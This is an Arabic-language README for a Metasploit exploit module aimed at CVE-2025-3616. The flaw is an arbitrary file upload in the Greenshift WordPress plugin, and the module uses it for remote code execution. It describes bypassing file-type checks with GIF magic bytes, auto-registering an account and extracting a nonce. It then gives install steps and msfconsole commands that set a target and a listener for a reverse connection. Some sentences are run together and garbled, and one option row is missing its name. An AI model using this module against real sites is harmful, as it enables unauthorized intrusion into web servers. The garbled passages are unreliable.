
وحدة Metasploit تستغل رفع الملفات التعسفي في إضافة Greenshift لـ WordPress (CVE-2025-3616) لتحقيق RCE عبر انتحال MIME، مع التسجيل التلقائي واستخراج nonce.
يحتوي هذا المستودع على وحدة Metasploit لاستغلال CVE-2025-3616، وهي ثغرة تحميل ملف عشوائي في إضافة Greenshift لووردبريس (الإصدارات 11.4 حتى 11.4.5).
تسمح هذه الثغرة للمستخدمين الموثقين (مشترك فما فوق) بتحميل ملفات عشوائية تؤدي إلى تنفيذ أكواد عن بعد (RCE). وهي تتجاوز التحقق من نوع الملف في الإضافة عن طريق تزوير نوع MIME باستخدام بايتات سحرية لـ GIF (GIF89a;).
USERNAME/PASSWORD).REGISTER لتسجيل مستخدم جديد تلقائيًا واستغلال الثغرة باستخدام ملفات تعريف الارتباط للجلسة الجديدة (مفيد إذا كان التسجيل ممكّنًا على الهدف).wp_rest من لوحة التحكم الإدارية.finfo_file().تأكد من تثبيت إطار عمل Metasploit.
انسخ wp_greenshift_file_upload.rb إلى دليل الوحدات المحلي لديك:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
ابدأ msfconsole وأعد تحميل الوحدات:
msfconsole
msf6 > reload_all
إذا كان التسجيل ممكّنًا على الهدف، فلن تحتاج إلى بيانات اعتماد.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
إذا كان لديك بالفعل مستخدم صالح (مشترك أو أعلى):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| الخيار | مطلوب | الوصف |
|---|---|---|
| RHOSTS | نعم | عنوان الهدف |
| LHOST | نعم | عنوان الاستماع (عنوان IP الخاص بك) |
| REGISTER | لا | اضبطه على true لتسجيل حساب جديد تلقائيًا (الافتراضي: false) |
| USERNAME | لا | اسم مستخدم ووردبريس (مطلوب إذا كان REGISTER خطأ) |
| PASSWORD | لا | كلمة مرور ووردبريس (مطلوب إذا كان REGISTER خطأ) |
| لا | البريد الإلكتروني للتسجيل (اختياري، يتم إنشاؤه تلقائيًا إذا كان فارغًا) |
هذه الوحدة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدام هذا الكود لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني.